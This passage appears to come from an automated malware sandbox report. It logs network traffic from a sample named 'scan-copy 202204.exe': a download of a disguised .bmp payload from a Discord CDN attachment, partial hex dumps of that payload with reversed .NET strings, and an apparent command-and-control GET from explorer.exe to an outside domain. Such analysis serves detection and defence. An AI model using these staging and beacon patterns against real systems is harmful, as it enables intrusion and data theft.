                                                      Apr 20, 2022 14:54:01.823204041 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823235035 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823249102 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823263884 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823270082 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823291063 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823328972 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823331118 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823342085 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823394060 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823400021 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823410988 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823443890 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823457003 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823491096 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823513985 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823549032 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823553085 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823563099 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823591948 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823592901 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823626041 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823649883 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823654890 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823667049 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823707104 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823719025 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823728085 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823743105 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823760986 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823791981 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823812008 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823821068 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823853016 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823864937 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823875904 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823920012 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823921919 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823932886 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823970079 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823980093 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.823987961 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824012041 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824028969 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824039936 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824063063 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824085951 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824085951 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824096918 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824131966 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824142933 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824152946 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824172974 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824186087 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824213028 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824223995 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824234009 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.824261904 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.824282885 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.839051008 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839148998 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.839716911 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839838028 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.839857101 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839896917 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839915037 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.839937925 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839962959 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.839967012 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.839998007 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.840009928 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840025902 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840035915 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.840065002 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840080976 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.840094090 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840111971 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840122938 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.840143919 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840183020 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840187073 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.840198040 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.840230942 CEST49742443192.168.2.3162.159.135.233
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 20, 2022 14:54:01.261050940 CEST6485153192.168.2.38.8.8.8
                                                      Apr 20, 2022 14:54:01.279979944 CEST53648518.8.8.8192.168.2.3
                                                      Apr 20, 2022 14:55:34.173739910 CEST5742153192.168.2.38.8.8.8
                                                      Apr 20, 2022 14:55:34.193831921 CEST53574218.8.8.8192.168.2.3
                                                      Apr 20, 2022 14:55:39.214274883 CEST6535853192.168.2.38.8.8.8
                                                      Apr 20, 2022 14:55:39.236721992 CEST53653588.8.8.8192.168.2.3
                                                      Apr 20, 2022 14:55:44.601444006 CEST6333253192.168.2.38.8.8.8
                                                      Apr 20, 2022 14:55:44.637526989 CEST53633328.8.8.8192.168.2.3
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Apr 20, 2022 14:54:01.261050940 CEST192.168.2.38.8.8.80x9a9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:34.173739910 CEST192.168.2.38.8.8.80x39b8Standard query (0)www.eco-friendly.oneA (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:39.214274883 CEST192.168.2.38.8.8.80xad2eStandard query (0)www.brickstoneinvestmentltd.comA (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:44.601444006 CEST192.168.2.38.8.8.80xb8deStandard query (0)www.allgamescracked.comA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Apr 20, 2022 14:54:01.279979944 CEST8.8.8.8192.168.2.30x9a9No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:54:01.279979944 CEST8.8.8.8192.168.2.30x9a9No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:54:01.279979944 CEST8.8.8.8192.168.2.30x9a9No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:54:01.279979944 CEST8.8.8.8192.168.2.30x9a9No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:54:01.279979944 CEST8.8.8.8192.168.2.30x9a9No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:34.193831921 CEST8.8.8.8192.168.2.30x39b8Name error (3)www.eco-friendly.onenonenoneA (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:39.236721992 CEST8.8.8.8192.168.2.30xad2eNo error (0)www.brickstoneinvestmentltd.combrickstoneinvestmentltd.comCNAME (Canonical name)IN (0x0001)
                                                      Apr 20, 2022 14:55:39.236721992 CEST8.8.8.8192.168.2.30xad2eNo error (0)brickstoneinvestmentltd.com198.54.114.195A (IP address)IN (0x0001)
                                                      Apr 20, 2022 14:55:44.637526989 CEST8.8.8.8192.168.2.30xb8deNo error (0)www.allgamescracked.comallgamescracked.comCNAME (Canonical name)IN (0x0001)
                                                      Apr 20, 2022 14:55:44.637526989 CEST8.8.8.8192.168.2.30xb8deNo error (0)allgamescracked.com81.88.48.71A (IP address)IN (0x0001)
                                                      • cdn.discordapp.com
                                                      • www.brickstoneinvestmentltd.com
                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349742162.159.135.233443C:\Users\user\Desktop\scan-copy 202204.exe
                                                      TimestampkBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.349759198.54.114.19580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Apr 20, 2022 14:55:39.418615103 CEST10585OUTGET /s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9D HTTP/1.1
                                                      Host: www.brickstoneinvestmentltd.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Apr 20, 2022 14:55:39.590019941 CEST10586INHTTP/1.1 301 Moved Permanently
                                                      keep-alive: timeout=5, max=100
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Wed, 20 Apr 2022 12:55:39 GMT
                                                      server: LiteSpeed
                                                      location: https://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9D
                                                      x-turbo-charged-by: LiteSpeed
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349742162.159.135.233443C:\Users\user\Desktop\scan-copy 202204.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-04-20 12:54:01 UTC0OUTGET /attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmp HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-04-20 12:54:01 UTC0INHTTP/1.1 200 OK
                                                      Date: Wed, 20 Apr 2022 12:54:01 GMT
                                                      Content-Type: image/x-ms-bmp
                                                      Content-Length: 1142272
                                                      Connection: close
                                                      CF-Ray: 6fee06b519316901-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 11170
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Disposition: attachment;%20filename=Usevbg_Pzmwkikx.bmp
                                                      ETag: "1d682a9946a3f6051998dc075cc74107"
                                                      Expires: Thu, 20 Apr 2023 12:54:01 GMT
                                                      Last-Modified: Wed, 20 Apr 2022 09:36:35 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1650447395713312
                                                      x-goog-hash: crc32c=CK0qsg==
                                                      x-goog-hash: md5=HWgqmUaj9gUZmNwHXMdBBw==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 1142272
                                                      X-GUploader-UploadID: ADPycdtn7dU2lMUPSAWFp8UItk_rrYiPBy2xShGhIftfHQAeVDrennVET1XWOe06QoAokilmfQLRtXP-K2iCKTXJ36L0LeoNSKKX
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mu3alBj2NFa90rEiQy4ZsUzCBl3k8JuyPgWeJWiUOdcJRqbj9tE3Qh1P8lXmB7g729FwYhiE2afCPtZnEXxm%2F5IvU6GwDGfiiygOvHtqqe%2F%2FWKXhW%2BlfvltGTB0A4WHjuil50g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      2022-04-20 12:54:01 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                      2022-04-20 12:54:01 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2022-04-20 12:54:01 UTC2INData Raw: 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 1f d1 58 7a 00 01 00 00 1f d1 58 7a 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 02 00 00 00 00 00 00 00 00 00 00 03 02 00 11 a0 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: ?XzXzOFNI_NOISREV_SV4XH0
                                                      2022-04-20 12:54:01 UTC4INData Raw: c8 4a 49 ac 2c cb 2a ca 28 cd 4d 4f ca 4a 37 62 92 62 b0 62 12 62 a8 60 ec 60 64 5a c5 c8 15 5a 9c 5a 96 94 ae 97 5a 91 0a 00 aa 15 2e 68 41 00 00 00 00 08 c2 ec 89 48 5d d1 ff e5 89 48 55 00 3d 00 49 00 58 00 5a 00 6d 00 5a 00 57 00 64 00 43 00 35 00 57 00 59 00 6a 00 4e 00 56 00 61 00 7a 00 31 00 57 00 51 00 02 00 00 00 50 08 0b 00 00 00 08 00 00 00 08 00 00 00 02 08 08 00 00 74 68 67 69 65 68 06 68 74 64 69 77 05 00 00 00 02 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 13 00 00 00 01 05 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 51 00 00 00 02
                                                      Data Ascii: JI,*(MOJ7bbbb``dZZZZ.hAH]HU=IXZmZWdC5WYjNVaz1WQPthgiehhtdiweziS.gniwarD.metsySa3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsySQ
                                                      2022-04-20 12:54:01 UTC5INData Raw: 03 00 07 06 06 06 06 06 06 06 06 01 01 01 01 01 06 06 06 06 06 06 06 06 01 00 00 03 01 01 01 01 01 01 01 01 01 73 64 72 6f 57 65 74 61 64 5f 6d 0b 72 61 64 6e 65 6c 61 43 74 6c 75 61 66 65 44 73 69 5f 6d 13 6d 65 74 49 61 74 61 44 6e 09 6f 66 6e 49 72 61 64 6e 65 6c 61 43 65 73 55 62 10 65 64 69 72 72 65 76 4f 72 65 73 55 65 73 75 5f 6d 11 44 49 65 72 75 74 6c 75 43 09 73 67 61 6c 46 74 61 6d 72 6f 66 0b 79 6c 6e 4f 64 61 65 52 73 69 5f 6d 0c 73 72 61 64 6e 65 6c 61 43 6c 61 6e 6f 69 74 70 6f 11 73 65 6d 61 4e 61 72 45 68 73 69 6c 67 6e 45 76 65 72 62 62 61 5f 6d 17 73 65 6d 61 4e 61 72 45 76 65 72 62 62 61 5f 6d 10 73 65 6d 61 4e 61 72 65 5f 6d 0a 73 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68
                                                      Data Ascii: sdroWetad_mradnelaCtluafeDsi_mmetIataDnofnIradnelaCesUbedirrevOresUesu_mDIerutluCsgalFtamrofylnOdaeRsi_msradnelaClanoitposemaNarEhsilgnEverbba_msemaNarEverbba_msemaNare_msnrettaPemiTgnoLllasnrettaPemiTtroh
                                                      2022-04-20 12:54:01 UTC6INData Raw: 79 53 74 6e 65 63 72 65 70 0d 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 74 6e 65 63 72 65 70 15 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 74 6e 65 63 72 65 70 17 6c 6f 62 6d 79 53 79 74 69 6e 69 66 6e 49 65 76 69 74 61 67 65 6e 16 6c 6f 62 6d 79 53 79 74 69 6e 69 66 6e 49 65 76 69 74 69 73 6f 70 16 6c 6f 62 6d 79 53 6e 61 6e 09 6c 6f 62 6d 79 53 79 63 6e 65 72 72 75 43 69 73 6e 61 12 6c 6f 62 6d 79 53 79 63 6e 65 72 72 75 63 0e 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 79 63 6e 65 72 72 75 63 18 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 16 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 72 65 62 6d 75 6e 14 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 72 65 62 6d 75 6e 16 6e 67 69 53 65 76 69 74 61 67 65 6e 0c 6e 67 69 53
                                                      Data Ascii: yStnecreprotarapeSpuorGtnecreprotarapeSlamiceDtnecreplobmySytinifnIevitagenlobmySytinifnIevitisoplobmySnanlobmySycnerruCisnalobmySycnerrucrotarapeSlamiceDycnerrucrotarapeSpuorGycnerrucrotarapeSpuorGrebmunrotarapeSlamiceDrebmunngiSevitagenngiS
                                                      2022-04-20 12:54:01 UTC8INData Raw: 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 00 01 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 00 00 00 00 00 00 00 00 04 04 04 04 04 04 04 04 04 04 04
                                                      Data Ascii:
                                                      2022-04-20 12:54:01 UTC9INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2022-04-20 12:54:01 UTC10INData Raw: 00 74 00 24 26 00 00 00 00 00 64 00 69 00 72 00 47 00 6f 00 54 00 70 00 61 00 6e 00 53 00 2e 00 73 00 69 00 68 00 74 00 24 20 00 00 04 3d 00 00 01 66 00 00 01 41 00 00 01 20 00 00 00 ff 00 00 00 d8 00 00 00 a7 00 00 00 86 00 00 00 69 00 00 00 50 00 00 00 25 00 00 00 00 39 74 42 bc 33 85 7d e8 17 9a 1d 94 0e b2 51 1b 04 53 a2 1d e6 d9 b4 32 b8 3a 2b 51 b6 a8 b5 43 9a 9b 6a 42 97 90 63 e1 87 89 cc 06 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 20 2c 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 66 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e
                                                      Data Ascii: t$&dirGoTpanS.siht$ =fA iP%9tB3}QS2:+QCjBca3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsyS ,eziS.gniwarD.metsySf980e439165c5a77b=n
